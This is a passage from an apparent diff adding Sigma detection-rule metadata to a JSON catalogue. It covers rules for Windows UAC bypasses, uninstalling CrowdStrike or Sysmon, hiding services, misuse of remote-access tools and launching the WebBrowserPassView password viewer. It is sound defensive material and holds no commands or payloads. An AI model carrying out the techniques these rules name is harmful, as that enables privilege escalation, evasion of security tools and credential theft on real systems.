Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, omkar72", + "level": "medium", + "falsepositive": [ + "Legitimate use of the utilities by legitimate user for legitimate reason" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "value": "UAC Bypass Using ChangePK and SLUI", + "meta": { + "refs": [ + "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", + "https://github.com/hfiref0x/UACME", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "value": "UAC Bypass Using Disk Cleanup", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", + "value": "Bypass UAC via CMSTP", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", + "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_uac_bypass_cmstp.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate use of cmstp.exe utility by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "value": "UAC Bypass Using Consent and Comctl32 - Process", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "value": "UAC Bypass Using DismHost", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "proc_creation_win_uac_bypass_dismhost.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "uuid": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "value": "UAC Bypass Using Event Viewer RecentViews", + "meta": { + "refs": [ + "https://twitter.com/orange_8361/status/1518970259868626944", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "creation_date": "2022/11/22", + "filename": "proc_creation_win_uac_bypass_eventvwr.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", + "value": "Bypass UAC via Fodhelper.exe", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_uac_bypass_fodhelper.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate use of fodhelper.exe utility by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", + "value": "UAC Bypass via Windows Firewall Snap-In Hijack", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml", + "author": "Tim Rauch", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", + "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "value": "UAC Bypass via ICMLuaUtil", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2022/09/13", + "filename": "proc_creation_win_uac_bypass_icmluautil.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", + "value": "UAC Bypass Using IDiagnostic Profile", + "meta": { + "refs": [ + "https://github.com/Wh04m1001/IDiagnosticProfileUAC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2022/07/03", + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "value": "UAC Bypass Using IEInstal - Process", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "proc_creation_win_uac_bypass_ieinstal.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "value": "UAC Bypass Using MSConfig Token Modification - Process", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "value": "UAC Bypass Using NTFS Reparse Point - Process", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "value": "UAC Bypass Using PkgMgr and DISM", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "value": "UAC Bypass Abusing Winsat Path Parsing - Process", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "proc_creation_win_uac_bypass_winsat.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "uuid": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "value": "UAC Bypass Using Windows Media Player - Process", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_uac_bypass_wmp.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "value": "Bypass UAC via WSReset.exe", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://www.activecyber.us/activelabs/windows-uac-bypass", + "https://twitter.com/ReaQta/status/1222548288731217921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_uac_bypass_wsreset.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown sub processes of Wsreset.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", + "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", + "value": "UAC Bypass WSReset", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://github.com/hfiref0x/UACME", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503", + "value": "Use of UltraViewer Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultraviewer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/09/25", + "filename": "proc_creation_win_ultraviewer.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", + "value": "Use of UltraVNC Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/10/02", + "filename": "proc_creation_win_ultravnc.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "uuid": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "value": "Uninstall Crowdstrike Falcon", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/12", + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Uninstall by admin" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion", + "uuid": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "value": "Uninstall Sysinternals Sysmon", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_sysmon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/01/12", + "filename": "proc_creation_win_uninstall_sysmon.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "uuid": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "value": "Unusual Child Porcess of dns.exe", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_child_process_of_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_unusual_child_process_of_dns_exe.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious parent process for cmd.exe", + "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", + "value": "Unusual Parent Process for cmd.exe", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_parent_for_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/09/21", + "filename": "proc_creation_win_unusual_parent_for_cmd.yml", + "author": "Tim Rauch", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "uuid": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "value": "User Discovery And Export Via Get-ADUser Cmdlet", + "meta": { + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2022/09/09", + "filename": "proc_creation_win_user_discovery_get_aduser.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "uuid": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "value": "Possible Privilege Escalation via Weak Service Permissions", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/30/weak-service-permissions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml", + "author": "Teymur Kheirkhabarov", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", + "uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "value": "Abuse of Service Permissions to Hide Services in Tools", + "meta": { + "refs": [ + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ], + "creation_date": "2021/12/20", + "filename": "proc_creation_win_using_sc_to_hide_sevices.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "high", + "falsepositive": [ + "Rare intended use of hidden services" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "uuid": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "value": "Abuse of Service Permissions to Hide Services Via Set-Service", + "meta": { + "refs": [ + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ], + "creation_date": "2022/10/17", + "filename": "proc_creation_win_using_set_service_to_hide_services.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Rare intended use of hidden services" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when verclsid.exe is used to run COM object via GUID", + "uuid": "d06be4b9-8045-428b-a567-740a26d9db25", + "value": "Verclsid.exe Runs COM Object", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", + "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/09", + "filename": "proc_creation_win_verclsid_runs_com.yml", + "author": "Victor Sergeev, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", + "value": "VMToolsd Suspicious Child Process", + "meta": { + "refs": [ + "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmtoolsd_susp_child_process.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1059" + ], + "creation_date": "2021/10/08", + "filename": "proc_creation_win_vmtoolsd_susp_child_process.yml", + "author": "behops, Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Legitimate use by administrator" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "value": "Java Running with Remote Debugging", + "meta": { + "refs": [ + "https://dzone.com/articles/remote-debugging-java-applications-with-jdwp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_vul_java_remote_debugging.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "uuid": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "value": "Use of W32tm as Timer", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", + "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1124" + ], + "creation_date": "2022/09/25", + "filename": "proc_creation_win_w32tm.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "uuid": "395907ee-96e5-4666-af2e-2ca91688e151", + "value": "Wab Execution From Non Default Location", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "creation_date": "2022/08/12", + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "uuid": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "value": "Wab/Wabmig Unusual Parent Or Child Processes", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "creation_date": "2022/08/12", + "filename": "proc_creation_win_wab_unusual_parents.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", + "uuid": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "value": "Weak or Abused Passwords In CLI", + "meta": { + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "creation_date": "2022/09/14", + "filename": "proc_creation_win_weak_or_abused_passwords.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of the passwords by users via commandline (should be discouraged)", + "Other currently unknown false positives" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of WebBrowserPassView.exe", + "uuid": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "value": "Launch WebBrowserPassView Executable", + "meta": { + "refs": [ + 